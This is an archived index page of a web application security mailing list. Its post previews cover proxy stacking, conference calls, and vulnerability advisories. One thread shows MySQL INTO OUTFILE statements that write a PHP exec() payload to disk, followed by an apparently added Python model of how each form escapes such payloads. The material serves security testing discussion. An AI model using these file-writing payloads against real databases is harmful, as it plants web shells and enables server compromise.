Web Application Security
(Page 12 of 333)
Re: stacking proxies 2012-01-02
Robert Hajime Lanning (robert lanning gmail com)
I am putting together: (in this order)
Nginx (ssl)
Varnish (caching)
Haproxy (load balancing/fail over)
On Dec 31, 2011 10:29 PM, "Robin Wood" <robin (at) digininja (dot) org> wrote:
> I watched Jason Haddix talk at BruCon and he talked about stacking
> proxy servers when doing web app tests so that you could g

Re: stacking proxies 2012-01-01
Robin Wood (robin digininja org)
On 1 January 2012 11:24, BookBag <asaad2 (at) gmail (dot) com> wrote:
> I tunnel everything thru tor. But be careful as DNS requests sometimes are
> done thru your IP. So its best to get your ip's thru any proxy and do the
> tests thru tor after you've got your ip's

Most of my clients like to know where the a

stacking proxies 2011-12-31
Robin Wood (robin digininja org)
I watched Jason Haddix talk at BruCon and he talked about stacking
proxy servers when doing web app tests so that you could get the best
out of each one.

I've been meaning to ask for a while, what proxies do people use when
stacking and in what order?


Positive Hack Days 2012 - Call For Paper 2011-12-21
cfp (cfp phdays com)
Positive Hack Days 2012 - Call For Paper
30-31 May 2012 / Moscow / Russia

What comes to your mind when you think of Russia? Fyodor [Dostoevsky] and Moscow? Sputnik and bears? Vodka and matryoshkas? Or Russian hackers?

Positive Russian hackers, organizers of the Positive Hack

Novell Sentinel Log Manager <= Path Traversal 2011-12-18
Andrea Fabrizi (andrea fabrizi gmail com)
Vuln: Path Traversal
Application: Sentinel Log Manager
Vendor: Novell
Version affected: <=
Website: http://www.novell.com/products/sentinel-log-manager/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi (at) gmail (dot) com
Web: http://ww

SANS AppSec 2012 CFP reminder 2011-12-02
SANS AppSec CFP (callforpapers-appsec sans org)
Hi everyone,

It's been over a month since we first announced the CFP for the SANS
AppSec Summit being held in Las Vegas, Nevada on April 30 - May 1, 2012.

We've received a number of great submissions so far but there's only two
months left until the deadline on February 1, 2012. If you'd like to

CanSecWest 2012 Mar 7-9; 2nd call for papers, closes next week, Monday. Dec 5 2011 2011-12-02
Dragos Ruiu (dr kyx net)
So after a dozen years or so organizing conferences, you
get the urge to pull levers and try experimenting with
things. So this year I sent out the CanSecWest CFP
only over Twitter, and G+ publicly. Just curious as to the
adoption and information dispersion rate, and some
estimate of the attent

different ways to use INTO OUTFILE in MySQL 2011-11-25
Robin Wood (robin digininja org)
I've been talking to Miroslav (sqlmap developer) about the way he
creates files using INTO OUTFILE. He uses the following syntax:

select "" INTO OUTFILE "/tmp/x" LINES TERMINATED BY "<?php exec('ls');?>";

But I've always used:

select "<?php exec('ls');?>" INTO OUTFILE "/tmp/y";

Both end up wi

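The two statements in the post above do not write identical bytes, because MySQL applies its FIELDS ... ESCAPED BY rules to column values but copies the LINES TERMINATED BY string to the file verbatim. The model below is an added example written for this page, not code from the original post, from sqlmap or from MySQL; it follows the output-encoding rules given in the MySQL reference manual for SELECT ... INTO OUTFILE with the default clauses (FIELDS TERMINATED BY '\t' ENCLOSED BY '' ESCAPED BY '\\' LINES TERMINATED BY '\n'). The multi-line payload, the output paths in the comments and the helper names are constructed for the illustration.

```python
# Added example: a model of how MySQL's SELECT ... INTO OUTFILE encodes
# rows, used to compare the two file-writing statements from the thread.
# This is not MySQL's own code; it reproduces the documented default
# behaviour so the two forms can be compared offline.

def encode_field(value, fields_terminated_by="\t", enclosed_by="",
                 escaped_by="\\", lines_terminated_by="\n"):
    """Encode one column value the way INTO OUTFILE writes it.

    With a non-empty ESCAPED BY character, MySQL prefixes that character
    to: the escape character itself, the ENCLOSED BY character, the first
    character of the FIELDS TERMINATED BY and LINES TERMINATED BY strings,
    and NUL (written as the escape character followed by an ASCII '0').
    SQL NULL is written as the escape character followed by 'N'.
    """
    if value is None:
        return escaped_by + "N" if escaped_by else "NULL"
    if not escaped_by:
        return enclosed_by + value + enclosed_by
    special = {escaped_by, enclosed_by,
               fields_terminated_by[:1], lines_terminated_by[:1]}
    special.discard("")
    encoded = []
    for ch in value:
        if ch == "\0":
            encoded.append(escaped_by + "0")
        elif ch in special:
            encoded.append(escaped_by + ch)
        else:
            encoded.append(ch)
    return enclosed_by + "".join(encoded) + enclosed_by


def into_outfile(rows, fields_terminated_by="\t", enclosed_by="",
                 escaped_by="\\", lines_terminated_by="\n"):
    """Return the text INTO OUTFILE would write for `rows`.

    Only column values pass through encode_field(); the LINES TERMINATED BY
    string is appended verbatim after every row, which is why a payload
    placed there is never escaped.
    """
    chunks = []
    for row in rows:
        chunks.append(fields_terminated_by.join(
            encode_field(v, fields_terminated_by, enclosed_by, escaped_by,
                         lines_terminated_by) for v in row))
        chunks.append(lines_terminated_by)
    return "".join(chunks)


# The one-line payload from the thread: it contains no tab, newline,
# backslash or NUL, so both forms write it unchanged (the second form
# adds a trailing newline).
ONE_LINE = "<?php exec('ls');?>"

# Constructed multi-line payload (not from the thread) showing where the
# two forms diverge: embedded newlines are escaped in a column value.
MULTI_LINE = "<?php\nexec('ls');\n?>"


def sqlmap_style(payload):
    # select "" INTO OUTFILE "/tmp/x" LINES TERMINATED BY "<payload>";
    return into_outfile([("",)], lines_terminated_by=payload)


def select_style(payload):
    # select "<payload>" INTO OUTFILE "/tmp/y";
    return into_outfile([(payload,)])


if __name__ == "__main__":
    for p in (ONE_LINE, MULTI_LINE):
        print("LINES TERMINATED BY form:", repr(sqlmap_style(p)))
        print("SELECT literal form:     ", repr(select_style(p)))
```

With the one-line payload both forms produce a working file, the second with a trailing newline. With the multi-line payload the SELECT-literal form writes a backslash before every embedded newline, which is not valid PHP outside a string, while the LINES TERMINATED BY form writes the payload byte for byte; the same applies to tabs and backslashes in a payload.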
CarolinaCon-8 (2012) Call for Papers/Presenters/Speakers 2011-11-21
Vic Vandal (vvandal well com)
CarolinaCon-8/2012 - Call for Papers/Presenters/Speakers

h4x0rs, InfoSec professionals, international spies, script kidz, and posers,

CarolinaCon-8 will occur on May 11th-13th 2012 in Raleigh NC (USA). We are now officially accepting speaker/paper/demo submissions for the event.

If you are s

Understanding the four attack modes in Burp Intruder 2011-11-09
Robin Wood (robin digininja org)
Seeing as I have to think about which mode does what when using Burp
Intruder I decided to do a blog post about it to hopefully solidify it
in my mind and help anyone else who wasn't sure:



New w3af release! (1.1) 2011-11-10
Andres Riancho (andres riancho gmail com)

Today we're releasing version 1.1 of w3af which includes the
following changes:

* Considerably increased performance by implementing gzip encoding
* Enhanced embedded bug report system using Trac's XMLRPC
* Fixed hundreds of bugs
* Fixed critical bug in au

MSIS research 2011-11-10
Steve Sirag (stevesirag gmail com)

My name is Steve Sirag. I'm studying for my Master's of Science in
Information Systems (emphasis on security).

My final research project is to discover the limits corporate
networks place on social networking applications, and how it compares
to online and print discussions of the same.

WordPress All Versions Full Path Disclosure (FPD) 2011-11-08
Ryan Dewhurst (ryandewhurst gmail com)

As part of my research on my tool WPScan, I have run the inspathx tool
against every version of WordPress released, excluding BETA and MU

The result is this tar file which contains a txt file for every
version of WordPress and the Full Path Disclosure vulnerabilities
which affect the

Re: SMS protection 2011-10-29
Marcel Tudorache (marceltudorache yahoo com)
Hi Nick,

Thank you for your answer.
It would be interesting to know why you think that it couldn't be used for online banking?

What I like about the SMSes as compared to the cryptographic tokens, is that you can receive the transaction details on your GSM which should be safer than via the email

Re: outlook web access authentication 2011-10-26
Neil McAllister (neilmca2011 gmail com)

I think it's critical to secure outward facing applications such as OWA, or
sharepoint! We used deepnet security dualshield to lock down all our IIS7
applications as well as terminal services, rdp and vpn connections etc. I would
recommend deepnet security. Their dualshield platform will secure OWA,

SANS AppSec 2012 CFP is Open 2011-10-26
SANS AppSec CFP (callforpapers-appsec sans org)
Hi everyone,

We're happy to announce that the sixth annual SANS AppSec Summit will be
held in Las Vegas, Nevada on April 30 - May 1, 2012.

The theme for this conference is "Application Security at Scale".

Billions of records in the cloud. Millions of smart mobile devices.
Millions of developers

AppSec DC 2012 - Call for Trainers 2011-10-24
AppSec DC (cfp appsecdc org)

OWASP is currently soliciting training providers for the OWASP AppSec
DC 2012 regional conference that will take place at the Walter E.
Washington Convention Center (801 Mount Vernon Place NW Washington, DC
20001) on April 2nd through 5th of 2012.  The theme for this year's
conference i

Agnitio Security Code Review Tool v2.1 released 2011-10-24
David Rook (david a rook gmail com)

I've released an update to Agnitio which I hope will help people
carry out security-focused code reviews and find vulnerabilities in the
source code they are reviewing.

The major changes in v2.1 are listed below:

1) Windows x64 support

2) Automatically decompile Android .apk application to ea

SMS protection 2011-10-21
Marcel Tudorache (marceltudorache yahoo com) (4 replies)

I was wondering how secure an SMS is when used as an authentication/transaction signing means for an application similar to online banking.

To make the analysis more targeted the following assumptions are made:
- I understand that the new smartphones can get viruses, but I would like to analy

Re: SMS protection 2011-10-25
Fyodor (fygrave gmail com) (1 replies)
Re: SMS protection 2011-10-29
Marcel Tudorache (marceltudorache yahoo com)
Re: SMS protection 2011-10-25
Francois Yang (francois y gmail com)
RE: SMS protection 2011-10-25
Jesse Mundis (jesse voltage com)
Re: SMS protection 2011-10-25
Robin Wood (robin digininja org)
AppSec DC 2012 CFP is OPEN! 2011-10-12
AppSec DC (cfp appsecdc org)

Building on the success of AppSec DC 2010 and 2009, OWASP is pleased
to announce the next OWASP AppSec DC conference. The theme for this
year's conference is "OWASP - Not just webapps anymore" to reflect the
new and revised scope of OWASP to include all application security
issues inst

Concrete5 <= SQL Injection and XSS Vulnerabilities 2011-10-04
Ryan Dewhurst (ryandewhurst gmail com)
# Exploit Title: Concrete5 <= SQL Injection and XSS Vulnerabilities
# Date: 2011-10-04
# Author: Ryan Dewhurst (ryandewhurst at gmail) (@ethicalhack3r)
# Software Link:
# Version: (tested)

Copyright 2010, SecurityFocus